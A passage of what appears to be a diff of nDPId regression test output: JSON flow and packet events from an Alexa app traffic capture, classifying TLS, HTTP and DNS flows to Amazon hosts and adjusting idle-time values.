+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 